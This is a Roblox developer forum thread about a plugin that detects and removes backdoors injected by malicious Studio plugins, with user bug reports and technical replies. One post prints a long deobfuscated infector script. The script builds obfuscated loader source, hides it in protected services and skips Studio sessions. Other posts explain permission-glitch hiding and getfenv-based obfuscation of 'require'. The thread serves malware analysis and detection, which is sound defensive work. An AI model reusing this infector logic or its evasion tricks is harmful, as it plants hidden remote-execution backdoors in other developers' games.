V2.1 - Plugin: Hidden Backdoor/Infection Script Detector (Detects/Removes infections from malicious plugins)

studio

#63

I ran it and it found a script as a virus (it wasn’t so I just ignored it), but then if I scan again the scan icon keeps loading and never finds anything so it just runs for eternity. Is that suppose to happen if it finds nothing? Why not make a prompt saying that it found nothing instead of running for eternity?

edit: it appears a few times it will say Infecton not found, but other times it will run for eternity (its been 30 minutes theres no way its still scanning)


#64

Unfortunately that doesn’t work for descendants of RobloxScript locked instances because they inherit the permission of its parent.


#65

Plugins can access RobloxLocked instances? Didn’t know that… :frowning:


#66

The way RobloxLocked instances work is kind of funny, actually. You can get a reference to an object through whatever means (usually GetService or FindFirstChild) and do whatever you want with it, including setting the parent of something to it, but if it’s RobloxLocked you can’t index it directly.

Plugins can access normal RobloxLocked Instances like the CoreGui just fine, but stuff like the CSGDictionaryService requires elevated permissions so you can’t directly index them. That’s why this plugin is a thing to begin with. I mentioned RobloxScript locked specifically because of this weirdness.

I have a bit of a more in-depth explanation for permissions here if you’re interested. It’s mostly unrelated but it defines script permissions and what RobloxScript means.


#67

They can’t access them or their children through normal means (i.e. game:GetService(“CSGDictionaryService”):GetChildren() will error) but you can set something’s parent to them (i.e. local Test=Instance.new("Script") Test.Source="--No print plz" print("Changed source") Text.Parent = game:GetService("CSGDictionaryService") print("Parented to RL object") wait() Test.Source="--Whoops, this won't work since it is now a descendanct of a RL script context level 6 parent" will change the source (to stop an unremovable Hello world console print) then parent the new script to the RL service but by doing so it will lose access to indexing or otherwise altering the script.) This is an engine permissions glitch that roblox intends to correct but for now a lot of malicious plugins are abusing this to inject backdoors into protected services in order to hide them from the developer and gain server-side execution access for them to execute whatever they’d like into the developer’s game.


ModuleScript with obfuscation
#68

I’m having a concerning problem, and without this plugin I don’t think I would’ve found it. Every time I start a new game in Studio and run a virus scan it always detects 2 infections. This can even be a baseplate and it still detects it. So what happens now? Is my Roblox infected or something? How can I get rid of those two viruses?


#69

Check your plugins, try removing them one by one and seeing which you have to disable to stop this plugin from detecting them.


#70

Ah that fixed it, thanks. I found a phony Plugin and got rid of it and the viruses don’t pop up anymore. I still have a problem of being unable to show a DestroyedMenu though. I don’t know whether if it was because of a bad plugin or if Roblox Studio was missing some files. Here’s my output when I right click on assets from the ToolBox.

16:25:45.061 - Unable to show a destroyed menu
16:25:45.062 - Stack Begin
16:25:45.062 - Script ‘Plugin_-1.Plugin.Core.Components.Asset.Asset’, Line 152 - field method
16:25:45.062 - Script ‘Plugin_-1.Plugin.Libs.Roact.SingleEventManager’, Line 41
16:25:45.064 - Stack End


#71

That’s a bug with the ToolBox plugin. Nothing to be done about it for the moment. :slightly_smiling_face:


#72

So it’s a Roblox update issue? Wow here I was trying to backtrack my 100 plugins.


#73

Yup. Just a bug with Roblox for the moment.


#74

I’ve already posted a bug report here, if you like the post it will show support and it is more likely to be noticed by staff if not already.

Also yeah, I was confused at the error at first as well.


#75

I did this on Boho Salon too and I decided to store it on the old version, then I updated and it’s just been running on and on and I know it’s still there as I checked for myself in the XML file.


#76

Lately whenever I press the Scan for Infection button, nothing really happens. The spinning circle icon doesn’t appear again, and no errors, warnings, nor other messages appear in the console. I’ve already tried reinstalling the plugin to no avail. What should I do?


#77

If you’re going to search for backdoors by checking source code for the phrase “require”, then add “\114\101\113\117\105\114\101” to your conditional, as it’s a common way to obfuscate “require”.


#78

The icon doesn’t change due to an update from ROBLOX. I’ll likely be putting a GUI in to show the status of the scan now.


#79

i never enable loadstring though


#80

I have deobfuscated the main infector script that is injected via most of these plugins - if you would like to take a look, enjoy:

--Deobfuscated by MSandbox v1.0.0 by 3dsboy08 (static-obfax)

local L_1_, L_2_, L_3_, L_4_, L_5_, L_6_, L_7_, L_8_, L_9_, L_10_, L_11_, L_12_, L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_
L_1_ = newproxy
L_2_ = true
L_1_ = L_1_(L_2_)
L_2_ = getmetatable
L_3_ = L_1_
L_2_ = L_2_(L_3_)
function L_3_(L_49_arg1, L_50_arg2)
	local L_51_
	if L_50_arg2 == "lshift" then
		function L_51_(L_52_arg1, L_53_arg2)
			local L_54_
			L_54_ = 2 ^ L_53_arg2
			L_54_ = L_52_arg1 * L_54_
			return L_54_
		end
		return L_51_
	elseif L_50_arg2 == "rshift" then
		function L_51_(L_55_arg1, L_56_arg2)
			return math.floor(L_55_arg1 / 2 ^ L_56_arg2)
		end
		return L_51_
	elseif L_50_arg2 == "_gbc" then
		function L_51_(L_57_arg1)
			while L_57_arg1 > 1 do
				L_57_arg1 = _UPVALUE0_.rshift(L_57_arg1, 1)
			end
			return 2
		end
		return L_51_
	elseif L_50_arg2 == "xor" then
		function L_51_(L_58_arg1, L_59_arg2)
			local L_60_, L_61_, L_62_, L_63_, L_64_, L_65_
			L_60_ = math
			L_60_ = L_60_.max
			L_61_ = _UPVALUE0_
			L_61_ = L_61_._gbc
			L_61_ = L_61_(L_62_)
			L_65_ = L_62_(L_63_)
			L_60_ = L_60_(L_61_, L_62_, L_63_, L_64_, L_65_, L_62_(L_63_))
			L_61_ = {}
			for L_66_forvar1 = 0, L_60_ - 1 do
				L_61_[L_60_ - L_66_forvar1] = _UPVALUE0_._gbc(L_58_arg1, L_66_forvar1, 1) ~= _UPVALUE0_._gbc(L_59_arg2, L_66_forvar1, 1) and 1 or 0
			end
			L_65_ = ""
			return L_62_(L_63_, L_64_)
		end
		return L_51_
	end
end
L_2_.__index = L_3_
L_2_ = newproxy
L_3_ = true
L_2_ = L_2_(L_3_)
L_3_ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
L_4_ = {
	L_5_,
	L_6_,
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_,
	L_14_,
	L_15_,
	L_16_,
	L_17_,
	L_18_,
	L_19_,
	L_20_
}
L_5_ = "\197\147"
L_6_ = "\226\136\145"
L_7_ = "\194\174"
L_11_ = "\226\136\154"
L_12_ = "\226\136\171"
L_13_ = "\203\154"
L_17_ = "\194\170"
L_18_ = "\194\186"
L_19_ = "\226\128\147"
L_20_ = "\226\137\160"
L_5_ = getmetatable
L_6_ = L_2_
L_5_ = L_5_(L_6_)
function L_6_(L_67_arg1, L_68_arg2)
	local L_69_
	if L_68_arg2 == "encode" then
		function L_69_(L_70_arg1)
			return (L_70_arg1:gsub(".", function(L_71_arg1)
				local L_72_
				L_72_ = ""
				for L_73_forvar1 = 8, 1, -1 do
					L_72_ = L_72_ .. (L_71_arg1:byte() % 2 ^ L_73_forvar1 - L_71_arg1:byte() % 2 ^ (L_73_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_72_
			end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function(L_74_arg1)
				local L_75_, L_76_, L_77_, L_78_, L_79_
				L_75_ = #L_74_arg1
				if L_75_ < 6 then
					L_75_ = ""
					return L_75_
				end
				L_75_ = 0
				for L_80_forvar1 = 1, 6 do
					L_75_ = L_75_ + (L_74_arg1:sub(L_80_forvar1, L_80_forvar1) == "1" and 2 ^ (6 - L_80_forvar1) or 0)
				end
				L_79_ = L_75_ + 1
				return L_76_(L_77_, L_78_, L_79_)
			end) .. ({
				"",
				"",
				""
			})[#L_70_arg1 % 3 + 1]
		end
		return L_69_
	elseif L_68_arg2 == "decode" then
		function L_69_(L_81_arg1)
			L_81_arg1 = string.gsub(L_81_arg1, "[^" .. _UPVALUE0_ .. "=]", "")
			return (L_81_arg1:gsub(".", function(L_82_arg1)
				local L_83_
				if L_82_arg1 == "=" then
					L_83_ = ""
					return L_83_
				end
				L_83_ = ""
				for L_84_forvar1 = 6, 1, -1 do
					L_83_ = L_83_ .. ((_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ L_84_forvar1 - (_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ (L_84_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_83_
			end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function(L_85_arg1)
				local L_86_, L_87_, L_88_, L_89_, L_90_
				L_86_ = #L_85_arg1
				if L_86_ ~= 8 then
					L_86_ = ""
					return L_86_
				end
				L_86_ = 0
				for L_91_forvar1 = 1, 8 do
					L_86_ = L_86_ + (L_85_arg1:sub(L_91_forvar1, L_91_forvar1) == "1" and 2 ^ (8 - L_91_forvar1) or 0)
				end
				return L_87_(L_88_)
			end))
		end
		return L_69_
	end
end
L_5_.__index = L_6_
L_5_ = newproxy
L_6_ = true
L_5_ = L_5_(L_6_)
L_6_ = getmetatable
L_7_ = L_5_
L_6_ = L_6_(L_7_)
function L_7_(L_92_arg1, L_93_arg2)
	local L_94_
	if L_93_arg2 == "split" then
		function L_94_(L_95_arg1, L_96_arg2)
			local L_97_, L_98_, L_99_, L_100_, L_101_
			L_97_ = {}
			L_101_ = L_96_arg2
			for L_102_forvar1 in L_98_(L_99_, L_100_) do
				table.insert(L_97_, L_102_forvar1)
			end
			return L_97_
		end
		return L_94_
	elseif L_93_arg2 == "die" then
		function L_94_()
			local L_103_, L_104_
			while true do
			end
		end
		return L_94_
	end
end
L_6_.__index = L_7_
L_6_ = game
L_7_ = L_6_
L_6_ = L_6_.WaitForChild
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.Workspace
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = {
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_
}
L_7_ = "\229\135\137"
L_11_ = "\195\140\194\191\226\128\162"
L_12_ = "\231\148\159"
L_13_ = "\194\191"
L_7_ = {}
for L_105_forvar1 = 48, 57 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_106_forvar1 = 65, 90 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_107_forvar1 = 97, 122 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
L_11_ = 900000
L_11_ = L_10_
L_12_ = "HttpService"
L_11_ = L_10_
L_12_ = true
L_11_ = game
L_12_ = L_11_
L_11_ = L_11_.GetService
L_13_ = "HttpService"
L_11_ = L_11_(L_12_, L_13_)
L_12_ = L_11_
L_11_ = L_11_.GenerateGUID
L_13_ = false
L_11_ = L_11_(L_12_, L_13_)
function L_12_(L_108_arg1)
	local L_109_, L_110_
	L_109_ = math
	L_109_ = L_109_.randomseed
	L_110_ = tick
	L_110_ = L_110_()
	L_109_(L_110_, L_110_())
	L_109_ = {}
	L_110_ = math
	L_110_ = L_110_.random
	for L_111_forvar1 = 1, #L_108_arg1 do
		if (L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 == L_111_forvar1 - 1 then
			L_109_[#L_109_ + 1] = L_108_arg1[L_111_forvar1]
		else
			L_109_[#L_109_ + 1] = L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1]
			L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1] = L_108_arg1[L_111_forvar1]
		end
	end
	return L_109_
end
G_1_ = L_12_
function L_12_(L_112_arg1, L_113_arg2, L_114_arg3)
	local L_115_, L_116_, L_117_, L_118_
	L_115_ = string
	L_115_ = L_115_.find
	L_116_ = L_112_arg1
	L_117_ = L_113_arg2
	L_116_ = L_115_(L_116_, L_117_)
	L_117_ = string
	L_117_ = L_117_.sub
	L_118_ = L_112_arg1
	L_117_ = L_117_(L_118_, 1, L_115_ - 1)
	L_118_ = string
	L_118_ = L_118_.sub
	L_118_ = L_118_(L_112_arg1, L_116_ + 1, string.len(L_112_arg1))
	return L_117_ .. L_114_arg3 .. L_118_
end
G_2_ = L_12_
function L_12_(L_119_arg1)
end
G_3_ = L_12_
L_12_ = {}
G_4_ = L_12_
L_12_ = Instance
L_12_ = L_12_.new
L_13_ = "Backpack"
L_12_ = L_12_(L_13_)
L_13_ = Instance
L_13_ = L_13_.new
L_13_ = L_13_(L_14_, L_15_)
if L_14_ ~= 7368818 then
	if L_14_ ~= 998796 then
		for L_120_forvar1 = 1, 20 do
			L_18_ = Instance
			L_18_ = L_18_.new
			L_19_ = "StringValue"
			L_20_ = L_13_
			L_18_ = L_18_(L_19_, L_20_)
			L_3_ = L_18_
			L_13_ = L_3_
		end
	end
end
G_5_ = L_14_
G_6_ = L_14_
G_7_ = L_14_
L_12_.Parent = L_14_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 1
L_18_ = 30000
L_17_ = math
L_17_ = L_17_.random
L_18_ = #L_6_
L_17_ = L_17_(L_18_)
L_17_ = L_6_[L_17_]
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_12_.Name = L_14_
L_17_ = 4
L_17_ = L_8_
L_18_ = 5
L_17_ = L_17_(L_18_)
L_17_ = "i"
L_18_ = L_8_
L_19_ = 6
L_18_ = L_18_(L_19_)
L_17_ = L_17_ .. L_18_
L_18_ = "i"
L_19_ = L_8_
L_20_ = 7
L_19_ = L_19_(L_20_)
L_18_ = L_18_ .. L_19_
L_19_ = "i"
L_20_ = L_8_
L_21_ = 8
L_20_ = L_20_(L_21_)
L_19_ = L_19_ .. L_20_
L_20_ = "i"
L_21_ = L_8_
L_22_ = 9
L_21_ = L_21_(L_22_)
L_20_ = L_20_ .. L_21_
L_21_ = "i"
L_22_ = L_8_
L_23_ = 10
L_22_ = L_22_(L_23_)
L_21_ = L_21_ .. L_22_
L_22_ = "i"
L_23_ = L_8_
L_24_ = 11
L_23_ = L_23_(L_24_)
L_22_ = L_22_ .. L_23_
L_23_ = "i"
L_24_ = L_8_
L_25_ = 12
L_24_ = L_24_(L_25_)
L_23_ = L_23_ .. L_24_
L_24_ = "i"
L_25_ = L_8_
L_26_ = 13
L_25_ = L_25_(L_26_)
L_24_ = L_24_ .. L_25_
L_25_ = "i"
L_26_ = L_8_
L_27_ = 14
L_26_ = L_26_(L_27_)
L_25_ = L_25_ .. L_26_
L_26_ = "i"
L_27_ = L_8_
L_28_ = 15
L_27_ = L_27_(L_28_)
L_26_ = L_26_ .. L_27_
L_27_ = "i"
L_28_ = L_8_
L_29_ = 16
L_28_ = L_28_(L_29_)
L_27_ = L_27_ .. L_28_
L_28_ = "i"
L_29_ = L_8_
L_30_ = 18
L_29_ = L_29_(L_30_)
L_28_ = L_28_ .. L_29_
L_29_ = "i"
L_30_ = L_8_
L_31_ = 3
L_30_ = L_30_(L_31_)
L_29_ = L_29_ .. L_30_
L_30_ = "i"
L_31_ = L_8_
L_32_ = 4
L_31_ = L_31_(L_32_)
L_30_ = L_30_ .. L_31_
L_31_ = "i"
L_32_ = L_8_
L_33_ = 5
L_32_ = L_32_(L_33_)
L_31_ = L_31_ .. L_32_
L_32_ = "i"
L_33_ = L_8_
L_34_ = 6
L_33_ = L_33_(L_34_)
L_32_ = L_32_ .. L_33_
L_33_ = "i"
L_34_ = L_8_
L_35_ = 7
L_34_ = L_34_(L_35_)
L_33_ = L_33_ .. L_34_
L_34_ = "i"
L_35_ = L_8_
L_36_ = 8
L_35_ = L_35_(L_36_)
L_34_ = L_34_ .. L_35_
L_35_ = "i"
L_36_ = L_8_
L_37_ = 5
L_36_ = L_36_(L_37_)
L_35_ = L_35_ .. L_36_
L_36_ = "i"
L_37_ = L_8_
L_38_ = 9
L_37_ = L_37_(L_38_)
L_36_ = L_36_ .. L_37_
L_37_ = "i"
L_38_ = L_8_
L_39_ = 5
L_38_ = L_38_(L_39_)
L_37_ = L_37_ .. L_38_
L_38_ = "i"
L_39_ = L_8_
L_40_ = 4
L_39_ = L_39_(L_40_)
L_38_ = L_38_ .. L_39_
L_39_ = "i"
L_40_ = L_8_
L_41_ = 3
L_40_ = L_40_(L_41_)
L_39_ = L_39_ .. L_40_
L_40_ = "i"
L_41_ = L_8_
L_42_ = 4
L_41_ = L_41_(L_42_)
L_40_ = L_40_ .. L_41_
L_41_ = "i"
L_42_ = L_8_
L_43_ = 6
L_42_ = L_42_(L_43_)
L_41_ = L_41_ .. L_42_
L_42_ = "i"
L_43_ = L_8_
L_44_ = 7
L_43_ = L_43_(L_44_)
L_42_ = L_42_ .. L_43_
L_43_ = {
	L_44_,
	L_45_,
	L_46_,
	L_47_,
	L_48_,
	"i" .. L_8_(5) .. " = require ",
	"i" .. L_8_(7) .. " = 'GetService' ",
	"i" .. L_8_(4) .. " = 'FindFirstChild' ",
	"i" .. L_8_(14) .. " = 'Description' ",
	"i" .. L_8_(16) .. " = 'GetProductInfo' ",
	"i" .. L_8_(4) .. " = 'Workspace' ",
	"i" .. L_8_(7) .. " = 'ReplicatedStorage' ",
	"i" .. L_8_(4) .. " = 'PlaceId' ",
	"i" .. L_8_(10) .. " = math.sqrt ",
	"i" .. L_8_(10) .. " = 'IsStudio' ",
	"i" .. L_8_(10) .. " = 'SSM' ",
	"i" .. L_8_(10) .. " = 'MarketplaceService' ",
	"i" .. L_8_(10) .. " = 'WaitForChild' ",
	"i" .. L_8_(10) .. " = 'RunService' ",
	"i" .. L_8_(10) .. " = pcall "
}
L_44_ = "i"
L_45_ = L_8_
L_46_ = 5
L_45_ = L_45_(L_46_)
L_46_ = " = 'Debris' "
L_44_ = L_44_ .. L_45_ .. L_46_
L_45_ = "i"
L_46_ = L_8_
L_47_ = 3
L_46_ = L_46_(L_47_)
L_47_ = " = game "
L_45_ = L_45_ .. L_46_ .. L_47_
L_46_ = "i"
L_47_ = L_8_
L_48_ = 8
L_47_ = L_47_(L_48_)
L_48_ = " = 'test' "
L_46_ = L_46_ .. L_47_ .. L_48_
L_47_ = "i"
L_48_ = L_8_
L_48_ = L_48_(5)
L_47_ = L_47_ .. L_48_ .. " = 'Name' "
L_48_ = "i"
L_48_ = L_48_ .. L_8_(10) .. " = 'ClassName' "
L_44_ = math
L_44_ = L_44_.random
L_45_ = 1
L_46_ = 200
L_44_ = L_44_(L_45_, L_46_)
L_45_ = {
	L_46_,
	L_47_,
	L_48_,
	L_14_ .. " = " .. 2655056793 / L_44_ .. " * " .. L_44_ .. " ",
	L_34_ .. " = 'load' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_46_ = L_42_
L_47_ = " = spawn "
L_46_ = L_46_ .. L_47_
L_47_ = L_25_
L_48_ = " = pcall "
L_47_ = L_47_ .. L_48_
L_48_ = L_22_
L_48_ = L_48_ .. " = require "
L_46_ = {
	L_47_,
	L_48_,
	L_38_ .. " = 'FindFirstChild' ",
	L_26_ .. " = getfenv ",
	L_39_ .. " = '?' ",
	L_41_ .. " = " .. L_40_ .. ".char ",
	L_36_ .. " = 'slo' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_25_ .. " = pcall ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_47_ = L_17_
L_48_ = " = 'GetService' "
L_47_ = L_47_ .. L_48_
L_48_ = L_18_
L_48_ = L_48_ .. " = 'Debris' "
L_47_ = {
	L_48_,
	101,
	113,
	117,
	105,
	114,
	101
}
L_48_ = 114
L_48_ = 5
L_48_ = math.random(1, 100000000)
for L_121_forvar1 = 1, #L_47_ do
	L_47_[L_121_forvar1] = L_47_[L_121_forvar1] * L_48_
end
L_45_ = G_1_(L_45_)
L_46_ = G_1_(L_46_)
G_8_ = ""
G_9_ = ""
L_43_ = G_1_(L_43_)
for L_122_forvar1 = 1, #L_45_ do
	G_9_ = G_9_ .. L_43_[L_122_forvar1] .. L_45_[L_122_forvar1]
end
L_43_ = G_1_(L_43_)
for L_123_forvar1 = 1, #L_46_ do
	G_8_ = G_8_ .. L_43_[L_123_forvar1] .. L_46_[L_123_forvar1]
end
Instance.new("Script").Source = L_40_ .. " = string " .. G_8_ .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. ")[" .. L_21_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. "))then return end;" .. L_25_ .. "(function() " .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. ") then " .. L_26_ .. "()[" .. L_41_ .. "(" .. L_47_[1] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[2] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[3] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[4] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[5] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[6] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[7] .. " / " .. L_48_ .. ")](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. "))[" .. L_36_ .. "](" .. L_35_ .. "[" .. L_23_ .. "]) end end)"
Instance.new("Script").Name = math.random(3, 5) .. L_6_[math.random(#L_6_)] .. math.random(1, 30000) .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)]
pcall(function()
	local L_124_
	L_124_ = _UPVALUE0_
	L_124_.Parent = game.NonReplicatedCSGDictionaryService
end)
if game.CreatorId ~= 7368818 and game.CreatorId ~= 998796 then
	pcall(function()
		spawn(function()
			game:WaitForChild("ServerScriptService")
			wait(1)
			G_10_ = game:GetService("Workspace"):GetDescendants()
			G_11_ = game:GetService("StarterGui"):GetDescendants()
			G_12_ = game:GetService("ServerScriptService"):GetDescendants()
			if #G_10_ >= 30 and #G_11_ >= 2 then
				if game:GetService("Debris"):FindFirstChild("?") then
					game:GetService("Debris"):FindFirstChild("?"):remove()
				end
				if not game:GetService("Debris"):FindFirstChild("?") then
					script:WaitForChild("?"):Clone().Parent = game:GetService("Debris")
				end
				if not G_10_[math.random(#G_10_)]:IsA("Camera") and not G_10_[math.random(#G_10_)]:IsA("Terrain") then
					_UPVALUE0_.Parent = G_10_[math.random(#G_10_)]
				end
			end
			if #G_12_ >= 2 then
				G_3_(_UPVALUE1_)
			end
		end)
	end)
end

Please note that floating point errors made by the obfuscator were removed - I have a previous version that still has these floating point errors for reference.

Also note that the deobfuscation quality isnt that great due to debugging information being removed. If anyone would like to beautify this further, go ahead.

The obfuscator used was VM based, and I might make a more specific post on how I deobfuscated this in the future. Stay tuned.


#82

Doesn’t matter. Apparently you can use getfenv with that string and it’ll parse into “require” and work as if the script they injected said “require(x)” to begin with. Synapse Xen obfuscates code this way, and so do a handful of other scripts with obfuscated backdoors.


#83

I don’t know if its something I’m doing but the scanning seems inconsistent for me. Sometimes the scan works and prints in the output what it has done but other times it doesn’t do anything at all (even on a blank baseplate with very few instances). It used to scan just fine a week ago and worked every time but now it doesn’t, or at least most of the time.

I’ve tried re-installing the plugin and changing settings.

Here is an error I got once: